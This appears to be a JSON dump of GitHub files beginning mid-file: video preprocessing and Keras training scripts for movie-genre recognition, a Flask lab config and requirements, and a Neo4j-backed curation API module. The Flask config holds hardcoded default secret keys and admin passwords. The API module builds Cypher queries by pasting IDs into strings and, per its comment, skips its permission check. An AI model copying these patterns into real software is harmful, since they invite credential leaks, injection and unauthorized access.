normalization=normalization,\n flip=flip, random_crop=random_crop)\n frame_sequence.append(frame)\n frame_sequence = np.stack(frame_sequence, axis=0)\n dst_dir = os.path.splitext(dst_dir)[0]+'.npy'\n np.save(dst_dir, frame_sequence)\n\n cap.release()\n\ndef preprocessing(list_dir, movie_dir, dest_dir, seq_len, img_size, overwrite=False, normalization=True,\n mean_subtraction=True, horizontal_flip=True, random_crop=True, consistent=True, continuous_seq=False):\n '''\n Extract video data to sequence of fixed length, and save it in npy file\n :param list_dir:\n :param Movie_dir:\n :param dest_dir:\n :param seq_len:\n :param img_size:\n :param overwrite: whether overwirte dest_dir\n :param normalization: normalize to (0, 1)\n :param mean_subtraction: subtract mean of RGB channels\n :param horizontal_flip: add random noise to sequence data\n :param random_crop: cropping using random location\n :param consistent: whether horizontal flip, random crop is consistent in the sequence\n :param continuous_seq: whether frames extracted are continuous\n :return:\n '''\n if os.path.exists(dest_dir):\n if overwrite:\n shutil.rmtree(dest_dir)\n else:\n raise IOError('Destination directory already exists')\n os.mkdir(dest_dir)\n #trainlist = combine_list_txt(list_dir)\n trainlist, testlist = combine_list_txt(list_dir)\n train_dir = os.path.join(dest_dir, 'train')\n test_dir = os.path.join(dest_dir, 'test')\n os.mkdir(train_dir)\n os.mkdir(test_dir)\n if mean_subtraction:\n mean = calc_mean(movie_dir, img_size).astype(dtype='float16')\n np.save(os.path.join(dest_dir, 'mean.npy'), mean)\n else:\n mean = None\n\n print('Preprocessing Movie data ...')\n for clip_list, sub_dir in [(trainlist, train_dir), (testlist, test_dir)]:\n\n for clip in clip_list:\n clip_name = os.path.basename(clip)\n #print(\"clip name = \" + clip_name)\n clip_category = os.path.dirname(clip)\n #print(\"clip category = \" + clip_category)\n category_dir = os.path.join(sub_dir, clip_category)\n #print(\"sub dir = \" + sub_dir)\n #print(\"category dir = \" + category_dir)\n src_dir = os.path.join(movie_dir, clip)\n #print(\"source = \"+src_dir)\n dst_dir = os.path.join(category_dir, clip_name)\n #print(\"destination = \"+dst_dir)\n #print()\n if not os.path.exists(category_dir):\n os.mkdir(category_dir)\n process_clip(src_dir, dst_dir, seq_len, img_size, mean=mean, normalization=normalization, horizontal_flip=horizontal_flip,\n random_crop=random_crop, consistent=consistent, continuous_seq=continuous_seq)\n\n print('Preprocessing done ...')\n\n\ndef calc_mean(movie_dir, img_size):\n frames = []\n print('Calculating RGB mean ...')\n for dirpath, dirnames, filenames in os.walk(movie_dir):\n for filename in filenames:\n path = os.path.join(dirpath, filename)\n if os.path.exists(path):\n cap = cv2.VideoCapture(path)\n if cap.isOpened():\n ret, frame = cap.read()\n # successful read and frame should not be all zeros\n if ret and frame.any():\n if frame.shape != (240, 320, 3):\n frame = scipy.misc.imresize(frame, (240, 320, 3))\n frames.append(frame)\n cap.release()\n frames = np.stack(frames)\n mean = frames.mean(axis=0, dtype='int64')\n mean = scipy.misc.imresize(mean, img_size)\n print('RGB mean is calculated over', len(frames), 'video frames')\n return mean\n\n\ndef preprocess_flow_image(flow_dir):\n videos = os.listdir(flow_dir)\n for video in videos:\n video_dir = os.path.join(flow_dir, video)\n flow_images = os.listdir(video_dir)\n for flow_image in flow_images:\n flow_image_dir = os.path.join(video_dir, flow_image)\n img = scipy.misc.imread(flow_image_dir)\n if np.max(img) < 140 and np.min(img) > 120:\n print('remove', flow_image_dir)\n os.remove(flow_image_dir)\n\n\ndef regenerate_data(data_dir, list_dir, Movie_dir):\n start_time = time.time()\n sequence_length = 10\n image_size = (216, 216, 3)\n\n dest_dir_pre = os.path.join(data_dir, 'Movie-Preprocessed-OF')\n # generate sequence for optical flow\n preprocessing(list_dir, Movie_dir, dest_dir_pre, sequence_length, image_size, overwrite=True, normalization=False,\n mean_subtraction=False, horizontal_flip=False, random_crop=True, consistent=True, continuous_seq=True)\n\n # compute optical flow data\n src_dir = dest_dir_pre\n dest_dir = os.path.join(data_dir, 'OF_data')\n optical_flow_prep(src_dir, dest_dir, mean_sub=True, overwrite=True)\n\n elapsed_time = time.time() - start_time\n print('Regenerating data takes:', int(elapsed_time / 60), 'minutes')\n\n\ndef preprocess_listtxt(list_dir, index, txt, txt_dest):\n\n index_dir = os.path.join(list_dir, index)\n txt_dir = os.path.join(list_dir, txt)\n dest_dir = os.path.join(list_dir, txt_dest)\n\n class_dict = dict()\n with open(index_dir) as fo:\n for line in fo:\n class_index, class_name = line.split()\n class_dict[class_name] = class_index\n #print(class_dict)\n #print()\n with open(txt_dir, 'r') as fo:\n lines = [line for line in fo]\n #print(lines)\n with open(dest_dir, 'w') as fo:\n for line in lines:\n class_name = os.path.dirname(line)\n class_index = class_dict[class_name]\n fo.write(line.rstrip('\\n') + ' {}\\n'.format(class_index))\n\ndef createListFiles(data_dir, src_name, dest_name):\n src_dir = os.path.join(data_dir, src_name)\n dest_dir = os.path.join(data_dir, dest_name )\n\n data_files = os.listdir(src_dir)\n\n classind = {}\n for c, fi in enumerate(data_files):\n classind[fi] = c\n\n if os.path.exists(dest_dir):\n print(\"path already exits\")\n else:\n os.mkdir(dest_dir)\n\n ind = os.path.join(dest_dir, 'index.txt')\n with open(ind, 'w') as f:\n for k, v in classind.items():\n f.write('{}'.format(v) + ' ' + k + '\\n')\n\n train_list = os.path.join(dest_dir, 'train.txt')\n test_list = os.path.join(dest_dir, 'test.txt')\n\n with open(train_list, 'w') as tr, open(test_list, 'w') as ts:\n for fol in classind.keys():\n data_path = os.path.join(src_dir, fol)\n data_list = os.listdir(data_path)\n\n data_list_size = len(data_list)\n div = round(0.8 * data_list_size)\n\n for i, fil in enumerate(data_list):\n file_path = os.path.join(fol, fil)\n #divid the data into train and test\n #the division can be defined here\n if i < div:\n tr.write(file_path + '\\n')\n else:\n ts.write(file_path + '\\n')\n\n\nif __name__ == '__main__':\n\n sequence_length = 10\n image_size = (216, 216, 3)\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n movie_dir = os.path.join(data_dir, 'Movie-dataset')\n\n #frames_dir = os.path.join(data_dir, 'frames\\\\mean.npy')\n\n #createListFiles(data_dir, movie_dir_name, list_name)\n\n # add index number to testlist file\n #index = 'index.txt'\n\n #preprocess_listtxt(list_dir, index, 'train.txt', 'trainlist.txt')\n #preprocess_listtxt(list_dir, index, 'test.txt', 'testlist.txt')\n\n\n\n regenerate_data(data_dir, list_dir, movie_dir)\n"
},
{
"alpha_fraction": 0.5726582407951355,
"alphanum_fraction": 0.5736708641052246,
"avg_line_length": 31.37704849243164,
"blob_id": "cd4751c88c07eb723daf2fcc03501ee98209ba6f",
"content_id": "282cee29040b90378636c7751d9293b701f37920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3950,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 122,
"path": "/dataOrganizing.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\n\ndef combine_list_txt(list_dir):\n testlisttxt = 'testlist.txt'\n trainlisttxt = 'trainlist.txt'\n\n testlist = []\n txt_path = os.path.join(list_dir, testlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n testlist.append(line[:line.rfind(' ')])\n\n trainlist = []\n txt_path = os.path.join(list_dir, trainlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n trainlist.append(line[:line.rfind(' ')])\n\n return trainlist, testlist\n\ndef preprocess_listtxt(list_dir, index, txt, txt_dest):\n\n index_dir = os.path.join(list_dir, index)\n txt_dir = os.path.join(list_dir, txt)\n dest_dir = os.path.join(list_dir, txt_dest)\n\n class_dict = dict()\n with open(index_dir) as fo:\n for line in fo:\n class_index, class_name = line.split()\n class_dict[class_name] = class_index\n #print(class_dict)\n #print()\n with open(txt_dir, 'r') as fo:\n lines = [line for line in fo]\n #print(lines)\n with open(dest_dir, 'w') as fo:\n for line in lines:\n class_name = os.path.dirname(line)\n class_index = class_dict[class_name]\n fo.write(line.rstrip('\\n') + ' {}\\n'.format(class_index))\n\ndef createListFiles(data_dir, src_name, dest_name):\n src_dir = os.path.join(data_dir, src_name)\n dest_dir = os.path.join(data_dir, dest_name )\n\n data_files = os.listdir(src_dir)\n\n classind = {}\n for c, fi in enumerate(data_files):\n classind[fi] = c\n\n if os.path.exists(dest_dir):\n print(\"path already exits\")\n else:\n os.mkdir(dest_dir)\n\n ind = os.path.join(dest_dir, 'index.txt')\n with open(ind, 'w') as f:\n for k, v in classind.items():\n f.write('{}'.format(v) + ' ' + k + '\\n')\n\n train_list = os.path.join(dest_dir, 'train.txt')\n test_list = os.path.join(dest_dir, 'test.txt')\n\n with open(train_list, 'w') as tr, open(test_list, 'w') as ts:\n for fol in classind.keys():\n data_path = os.path.join(src_dir, fol)\n data_list = os.listdir(data_path)\n\n data_list_size = len(data_list)\n div = round(0.8 * data_list_size)\n\n for i, fil in enumerate(data_list):\n file_path = os.path.join(fol, fil)\n #divid the data into train and test\n #the division can be defined here\n if i < div:\n tr.write(file_path + '\\n')\n else:\n ts.write(file_path + '\\n')\n\ndef create_list_of_frames(src_dir, dest_dir, train_dir):\n index_file_dir = os.path.join(dest_dir, \"index.txt\")\n\n if train_dir:\n sub_dir = os.path.join(src_dir, 'train')\n list_file_dir = os.path.join(dest_dir, \"list_train_data2.txt\")\n else:\n sub_dir = os.path.join(src_dir, 'test')\n list_file_dir = os.path.join(dest_dir, \"list_test_data2.txt\")\n\n class_dict = dict()\n with open(index_file_dir) as fo:\n for line in fo:\n class_index, class_name = line.split()\n class_dict[class_name] = class_index\n\n with open(list_file_dir, 'w') as file_list:\n for class_name in class_dict.keys():\n data_path = os.path.join(sub_dir, class_name)\n list_data = os.listdir(data_path)\n\n for i, file_name in enumerate(list_data):\n file_path = os.path.join(data_path, file_name)\n\n file_list.write(file_path + '\\n')\n\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n src_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n #createListFiles(data_dir, 'Movie_samples', 'listdata')\n\n index = 'index.txt'\n\n #preprocess_listtxt(list_dir, index, 'train.txt', 'trainlist.txt')\n #preprocess_listtxt(list_dir, index, 'test.txt', 'testlist.txt')\n\n create_list_of_frames(src_dir, list_dir, train_dir=False)\n"
},
{
"alpha_fraction": 0.618681788444519,
"alphanum_fraction": 0.6348564624786377,
"avg_line_length": 37.640625,
"blob_id": "d97002446bb54e3c116cd7f91a5e3e6c2348f859",
"content_id": "4e82ad0adf82990db6d72d7bc35c29cd2af242fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2473,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 64,
"path": "/training_frames.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport keras.callbacks\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom generators import seq_generator, img_generator, get_data_list\nfrom models import finetuned_resnet, CNN\nfrom keras.optimizers import SGD\n\nCLASSES = 5\nBATCH_SIZE = 20\n\ndef fit_model(model, train_dir, test_dir, weights_dir, input_shape, optic=False):\n\n try:\n train_generator = ImageDataGenerator.flow_from_directory(train_dir,batch_size=20, class_mode='categorical')\n test_generator = ImageDataGenerator.flow_from_directory(test_dir, batch_size=20, class_mode='categorical')\n\n for data_batch, labels_batch in train_generator:\n print('data batch shape', data_batch.shape)\n print('labels batch shape', labels_batch.shape)\n break\n '''\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n print(model.summary())\n\n print('Start fitting model')\n\n while True:\n callbacks = [keras.callbacks.ModelCheckpoint(weights_dir, save_best_only=True, save_weights_only=True),\n keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.001, patience=10, verbose=1, mode='auto'),\n keras.callbacks.TensorBoard(log_dir='.\\\\logs\\\\try', histogram_freq=0, write_graph=True, write_images=True)]\n model.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=test_generator,\n validation_steps=25,\n verbose=1,\n callbacks=callbacks\n )\n print('finished')\n '''\n\n except KeyboardInterrupt:\n print(\"Training is intrrupted!\")\n\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n weights_dir = os.getcwd()\n video_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n\n train_data = os.path.join(video_dir, 'train')\n test_data = os.path.join(video_dir, 'test')\n\n print(train_data)\n print(test_data)\n\n input_shape = (216, 216, 3)\n weights_dest = os.path.join(weights_dir, 'finetuned_resnet_RGB_frames_1.h5')\n #model = finetuned_resnet(include_top=True, weights_dir=weights_dest)\n #fit_model(model, train_data, test_data, weights_dest, input_shape)\n"
},
{
"alpha_fraction": 0.5897336006164551,
"alphanum_fraction": 0.5938168168067932,
"avg_line_length": 30.169696807861328,
"blob_id": "0908959770a159b45e312b36a8ee0cd326f004a2",
"content_id": "8c30587b4ea4779527b476a5714385bacf83d42f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5143,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 165,
"path": "/generators.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport random\nimport scipy.misc\n\ndef get_class_index(list_dir):\n class_index = dict()\n class_dir = os.path.join(list_dir, 'index.txt')\n with open(class_dir) as fo:\n for line in fo:\n class_number, class_name = line.split()\n class_number = int(class_number)\n class_index[class_name] = class_number\n return class_index\n\ndef get_data(list_dir):\n train_list_dir = os.path.join(list_dir, 'list_train_data2.txt')\n test_list_dir = os.path.join(list_dir, 'list_test_data2.txt')\n\n class_index = dict()\n class_dir = os.path.join(list_dir, 'index.txt')\n with open(class_dir) as fo:\n for line in fo:\n class_number, class_name = line.split()\n class_number = int(class_number)\n class_index[class_name] = class_number\n\n train_data = []\n\n count=0\n with open(train_list_dir) as trainlist:\n for i, clip in enumerate(trainlist):\n clip_class = os.path.basename(os.path.dirname(clip))\n train_data.append((clip, class_index[clip_class]))\n count+=1\n if count < 5:\n print(clip_class)\n\n test_data = []\n with open(test_list_dir) as testlist:\n for i, clip in enumerate(testlist):\n clip_class = os.path.basename(os.path.dirname(clip))\n test_data.append((clip, class_index[clip_class]))\n\n return train_data, test_data\n\n'''\ndef frame_generator(data_dir, batch_size):\n\n class_index = get_class_index()\n\n while True:\n\n\n\n yield\n'''\n\ndef seq_generator(datalist, batch_size, input_shape, num_classes):\n\n x_shape = (batch_size,) + input_shape\n y_shape = (batch_size, num_classes)\n index = 0\n\n while True:\n batch_x = np.ndarray(x_shape)\n batch_y = np.zeros(y_shape)\n\n for i in range(batch_size):\n step = random.randint(1, len(datalist) - 1)\n index = (index + step) % len(datalist)\n clip_dir, clip_class = datalist[index]\n batch_y[i, clip_class - 1] = 1\n clip_dir = os.path.splitext(clip_dir)[0] + '.npy'\n\n count = 0\n while not os.path.exists(clip_dir):\n count += 1\n if count > 20:\n raise FileExistsError('Too many file missing')\n index = (index + 1) % len(datalist)\n clip_dir, class_idx = datalist[index]\n clip_data = np.load(clip_dir)\n if clip_data.shape != batch_x.shape[1:]:\n raise ValueError('The number of time sequence is nconsistent with the video data')\n batch_x[i] = clip_data\n\n yield batch_x, batch_y\n\n\ndef img_generator(data_list, batch_size, input_shape, num_classes):\n\n batch_image_shape = (batch_size,) + input_shape[1:]\n batch_image = np.ndarray(batch_image_shape)\n\n video_gen = seq_generator(data_list, batch_size, input_shape, num_classes)\n\n while True:\n batch_video, batch_label = next(video_gen)\n for idx, video in enumerate(batch_video):\n sample_frame_idx = random.randint(0, input_shape[0] - 1)\n sample_frame = video[sample_frame_idx]\n batch_image[idx] = sample_frame\n\n yield batch_image, batch_label\n\ndef get_data_list(list_dir, video_dir):\n '''\n Input parameters:\n list_dir: 'root_dir/data/ucfTrainTestlist'\n video_dir: directory that stores source train and test data\n\n Return value:\n test_data/train_data: list of tuples (clip_dir, class index)\n class_index: dictionary of mapping (class_name->class_index)\n '''\n train_dir = os.path.join(video_dir, 'train')\n test_dir = os.path.join(video_dir, 'test')\n testlisttxt = 'testlist.txt'\n trainlisttxt = 'trainlist.txt'\n\n testlist = []\n txt_path = os.path.join(list_dir, testlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n testlist.append(line[:line.rfind(' ')])\n\n trainlist = []\n txt_path = os.path.join(list_dir, trainlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n trainlist.append(line[:line.rfind(' ')])\n\n class_index = dict()\n class_dir = os.path.join(list_dir, 'index.txt')\n with open(class_dir) as fo:\n for line in fo:\n class_number, class_name = line.split()\n class_number = int(class_number)\n class_index[class_name] = class_number\n\n train_data = []\n for i, clip in enumerate(trainlist):\n clip_class = os.path.dirname(clip)\n dst_dir = os.path.join(train_dir, clip)\n train_data.append((dst_dir, class_index[clip_class]))\n\n test_data = []\n for i, clip in enumerate(testlist):\n clip_class = os.path.dirname(clip)\n dst_dir = os.path.join(test_dir, clip)\n test_data.append((dst_dir, class_index[clip_class]))\n\n return train_data, test_data, class_index\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n src_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n\n r,s = get_data(list_dir)\n\n print(len(r))\n print(len(s))\n"
}
] | 7 |
krystanRamcharan/info3180-lab4
|
https://github.com/krystanRamcharan/info3180-lab4
|
c94c6d8d6dbb0e419fff911f9e93f480b8805606
|
1963519887645e83a000735d25d1b4534f09195f
|
7a005b996bb7aeaef4e70aac7f84724506a780ec
|
refs/heads/master
| 2022-03-11T08:43:37.737368 | 2022-02-28T01:41:25 | 2022-02-28T01:41:25 | 242,217,896 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.6848484873771667,
"avg_line_length": 15.5,
"blob_id": "1f926990364d0c7d8f39353848d4d64aa5a9e732",
"content_id": "3f0b8ed72f3c81b9aa0392cbc4443f0f030dabfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 10,
"path": "/requirements.txt",
"repo_name": "krystanRamcharan/info3180-lab4",
"src_encoding": "UTF-8",
"text": "click==8.0.4\nFlask==2.0.3\nFlask-WTF==1.0.0\ngunicorn==20.1.0\nitsdangerous==2.1.0\nJinja2==3.0.3\nMarkupSafe==2.1.0\npython-dotenv==0.19.2\nWerkzeug==2.0.3\nWTForms==3.0.1\n"
},
{
"alpha_fraction": 0.663239061832428,
"alphanum_fraction": 0.6683804392814636,
"avg_line_length": 31,
"blob_id": "0d7171c8ee1cee7d26bb1a48c3a2a25fbfcd6f1a",
"content_id": "706fb03e0ec0c6fb58dcbd5012b37c8346182cb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 389,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 12,
"path": "/app/config.py",
"repo_name": "krystanRamcharan/info3180-lab4",
"src_encoding": "UTF-8",
"text": "import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass Config(object):\n \"\"\"Base Config Object\"\"\"\n DEBUG = False\n SECRET_KEY = os.environ.get('SECRET_KEY', 'Som3$ec5etK*y')\n ADMIN_USERNAME = os.environ.get('ADMIN_USERNAME', 'admin')\n ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', 'passcode2222')\n UPLOAD_FOLDER =os.environ.get('UPLOAD_FOLDER', './uploads')\n \n"
}
] | 2 |
VirtualFlyBrain/vfb-data-ingest-api
|
https://github.com/VirtualFlyBrain/vfb-data-ingest-api
|
68ff54bd54486c2170e125ddfbcd3d515e321662
|
96ae3b264c882b6dba08d68061ace346e095356c
|
84f9ec6399e506bd6c94533b5d6a133e857528d7
|
refs/heads/master
| 2023-05-13T18:49:36.888984 | 2022-08-22T08:07:10 | 2022-08-22T08:07:10 | 172,968,394 | 0 | 0 |
NOASSERTION
| 2019-02-27T18:31:35 | 2022-03-01T08:46:09 | 2023-05-03T19:04:42 |
Python
|
[
{
"alpha_fraction": 0.5534486174583435,
"alphanum_fraction": 0.5607443451881409,
"avg_line_length": 41.79917526245117,
"blob_id": "981a10dbd896de85b0c284715b9260334ebb1674",
"content_id": "af9f1293f8c7540663afd9f79495b86c62d6859e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31114,
"license_type": "permissive",
"max_line_length": 209,
"num_lines": 727,
"path": "/vfb_curation_api/database/repository/repository.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from neo4jrestclient.client import GraphDatabase\nfrom vfb_curation_api.database.models import Neuron, Dataset, Project, User, Split, SplitDriver\nfrom vfb_curation_api.api.vfbid.errorcodes import NO_PERMISSION, INVALID_NEURON, UNKNOWNERROR, INVALID_DATASET, INVALID_SPLIT\nimport os\nimport json\nimport requests\nimport tempfile\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.neo4j_tools import neo4j_connect\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.KB_tools import KB_pattern_writer\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.KB_tools import kb_owl_edge_writer\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.flybase2neo.feature_tools import FeatureMover, split\n\nclass VFBKB():\n def __init__(self):\n self.db = None\n self.kb_owl_pattern_writer = None\n self.feature_mover = None\n self.max_base36 = 1679615 # Corresponds to the base36 value of ZZZZZZ\n self.db_client = \"vfb\"\n self.client_id = os.environ['CLIENT_ID_AUTHORISATION']\n self.client_secret = os.environ['CLIENT_SECRET_AUTHORISATION']\n self.redirect_uri = os.environ['REDIRECT_URI_AUTHORISATION']\n self.authorisation_token_endpoint = os.environ['ENDPOINT_AUTHORISATION_TOKEN']\n\n\n ######################\n #### Core methods ####\n ######################\n\n def init_db(self):\n if not self.db:\n self.kb = os.getenv('KBserver')\n self.user = os.getenv('KBuser')\n self.password = os.getenv('KBpassword')\n try:\n if self.db_client==\"vfb\":\n self.db = neo4j_connect(self.kb, self.user, self.password)\n self.kb_owl_pattern_writer = KB_pattern_writer(self.kb, self.user, self.password)\n self.kb_owl_edge_writer = kb_owl_edge_writer(self.kb, self.user, self.password)\n self.feature_mover = FeatureMover(self.kb, self.user, self.password, tempfile.gettempdir())\n else:\n self.db = GraphDatabase(self.kb, username=self.user, password=self.password)\n self.prepare_database()\n if os.getenv('LOAD_TEST_DATA'):\n self.load_test_data()\n return True\n except Exception as e:\n print(\"Database could not be initialised: {}\".format(e))\n return False\n else:\n return True\n\n def prepare_database(self):\n q_orcid_unique = \"CREATE CONSTRAINT ON (a:Person) ASSERT a.orcid IS UNIQUE\"\n q_projectid_unique = \"CREATE CONSTRAINT ON (a:Project) ASSERT a.projectid IS UNIQUE\"\n self.query(q_orcid_unique)\n self.query(q_projectid_unique)\n\n def load_test_data(self):\n test_cypher_path = os.path.normpath(os.path.join(os.path.dirname(__file__), '../testdata.cypher'))\n with open(test_cypher_path, 'r') as file:\n q_test_data = file.read()\n self.query(q_test_data)\n\n def parse_vfb_client_data(self, data_in):\n data = []\n for d_in in data_in:\n #print(d_in)\n columns = d_in['columns']\n #print(columns)\n for rec in d_in['data']:\n d = dict()\n print(rec)\n for i in range(len(columns)):\n print(i)\n d[columns[i]]=rec['row'][i]\n data.append(d)\n #print(\"DATAOUT: \" + str(data))\n return data\n\n def parse_neo4j_default_client_data(self, data_in):\n #print(\"DATAIN: \" + str(data_in.rows))\n data = []\n columns = []\n if data_in.rows:\n for c in data_in.rows[0]:\n columns.append(c)\n #print(str(columns))\n if data_in.rows:\n for d_row in data_in.rows:\n d = dict()\n for c in columns:\n d[c] = d_row[c]\n data.append(d)\n #print(\"DATAOUT: \" + str(data))\n return data\n\n def query(self,q):\n print(\"Q: \"+str(q))\n if self.init_db():\n if self.db_client == \"vfb\":\n x = self.parse_vfb_client_data(self.db.commit_list([q]))\n else:\n x = self.parse_neo4j_default_client_data(self.db.query(q,data_contents=True))\n return x\n else:\n raise DatabaseNotInitialisedError(\"Database not initialised!\")\n\n def authenticate(self, code, redirect_uri):\n data = {'client_id': self.client_id,\n 'client_secret': self.client_secret,\n 'grant_type': 'authorization_code',\n 'code': \"{}\".format(code),\n 'redirect_uri': redirect_uri }\n #print(data)\n # sending post request and saving response as response object\n r = requests.post(url=self.authorisation_token_endpoint, data=data)\n #print(r.text)\n d = json.loads(r.text)\n # {\"access_token\",\"token_type\",\"refresh_token\",\"expires_in\",\"scope\",\"name\":\"Nicolas Matentzoglu\",\"orcid\":\"0000-0002-7356-1779\"}\n orcid = \"https://orcid.org/{}\".format(d['orcid'])\n return self.get_user(orcid)\n\n ################################\n #### Data retrieval ############\n ################################\n\n # Labels:\n # n: project\n # p: person\n # d: dataset\n # i: neuron\n\n\n def valid_user(self, apikey, orcid):\n if self.get_user(orcid, apikey):\n return True\n return False\n\n def _get_project_permission_clause(self, orcid, project=None):\n # q = \"MATCH (n:Project \"\n # if project:\n # q = q + \"{iri:'%s'}\" % self._format_vfb_id(project,\"project\")\n # q = q + \")<-[:has_admin_permissions]-(p:Person {iri: '%s'}) \" % orcid\n # return q\n\n # TODO disabled permission check for end2end tests\n q = \"MATCH (n:Project \"\n if project:\n q = q + \"{iri:'%s'}\" % self._format_vfb_id(project,\"project\")\n q = q + \") \"\n return q\n\n def _get_project_return_clause(self):\n return \" RETURN n.iri as id, n.short_form as short_name, n.label as primary_name, n.start as start, n.description as description\"\n\n def _get_dataset_permission_clause(self, orcid, datasetid=None, project=None, extra_dataset=False):\n q = self._get_project_permission_clause(orcid,project)\n q = q + \"MATCH (n)<-[:has_associated_project]-(d:DataSet \"\n if datasetid:\n q = q + \"{iri: '%s'}\" % self._format_vfb_id(datasetid, \"reports\")\n q = q + \") \";\n if extra_dataset:\n q = q + \"OPTIONAL MATCH (d)-[:has_license]-(l:License) \"\n q = q + \"OPTIONAL MATCH (d)-[:has_reference]-(pu:pub) \"\n return q\n\n def _get_dataset_return_clause(self):\n return \" RETURN d.iri as id, d.short_form as short_form, d.label as title, d.description as description, d.dataset_link as source_data, l.iri as license, pu.iri as publication, n.short_form as project\"\n\n def _get_neuron_permission_clause(self, orcid, neuronid=None, datasetid=None,project=None):\n q = self._get_dataset_permission_clause(orcid,datasetid,project)\n q = q + \"MATCH (i \"\n if neuronid:\n q = q + \"{iri: '%s'}\" % self._format_vfb_id(neuronid, \"reports\")\n q = q + \")-[:has_source]->(d) \"\n return q\n\n\n def _format_vfb_id(self,id,type):\n if id.startswith(\"http:\"):\n nid = id\n else:\n nid = \"http://virtualflybrain.org/{}/{}\".format(type, id)\n return nid\n\n def _add_result_to_map_if_not_exists(self,item, map,key):\n if key not in map:\n map[key] = []\n if item not in map[key]:\n if isinstance(item, list):\n map[key].extend(item)\n else:\n map[key].append(item)\n return map\n\n def _get_neuron_relations(self,neuronid):\n q = \"MATCH (i {iri: '%s'})-[r]-(q) \" % self._format_vfb_id(neuronid,\"reports\")\n q = q + \"\"\"\nMATCH (i)-[cli:INSTANCEOF]-(cl:Class)\nMATCH (i)-[ {iri:\"http://xmlns.com/foaf/0.1/depicts\"}]-(c:Individual) \nMATCH (c)-[ir:in_register_with]-(t:Template)\nMATCH (c)-[ {iri:\"http://purl.obolibrary.org/obo/OBI_0000312\"}]-(it) \nOPTIONAL MATCH (i)-[cr:database_cross_reference]-(xref:Site)\nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/BFO_0000050\"}]-(po) \nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002292\"}]-(dl) \nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002131\"}]-(np)\nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002110\"}]-(inp) \nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002113\"}]-(onp) \nRETURN xref.short_form as resource_id, \ncr.accession as external_id, \nt.short_form as template_id, \nir.filename as filename, \nit.label as imaging_type, \ncl.iri as classification, \ncli.comment as classification_comment, \ncollect(DISTINCT po.short_form) as part_of, \ncollect(DISTINCT dl.short_form) as driver_line, \ncollect(DISTINCT np.short_form) as neuropils, \ncollect(DISTINCT inp.short_form) as input_neuropils,\ncollect(DISTINCT onp.short_form) as output_neuropils\"\"\"\n rels = {}\n results = self.query(q=q)\n if not results:\n raise VFBError(\"Neuron does not exist, or could not be retrieved.\")\n for r in results:\n d = dict()\n d['resource_id'] = r['resource_id']\n d['external_id'] = r['external_id']\n rels = self._add_result_to_map_if_not_exists(d, rels, \"cross_references\")\n for i in [\"neuropils\", \"input_neuropils\",\n \"output_neuropils\",\"driver_line\",\"part_of\"]:\n rels = self._add_result_to_map_if_not_exists(r[i], rels, i)\n for i in [\"classification\",\"classification_comment\",\n \"imaging_type\", \"filename\", \"template_id\"]:\n rels[i] = r[i] # This assumes there is really just one match. Which there is if the KB is consistent\n return rels\n\n def _get_neuron_return_clause(self):\n return \" RETURN i.iri as id, i.label as primary_name, n.iri as projectid, d.iri as datasetid, i.synonyms as syns\"\n\n def has_project_write_permission(self, project, orcid):\n if self.get_project(project,orcid):\n return True\n return False\n\n def has_dataset_write_permission(self, datasetid, orcid):\n # if 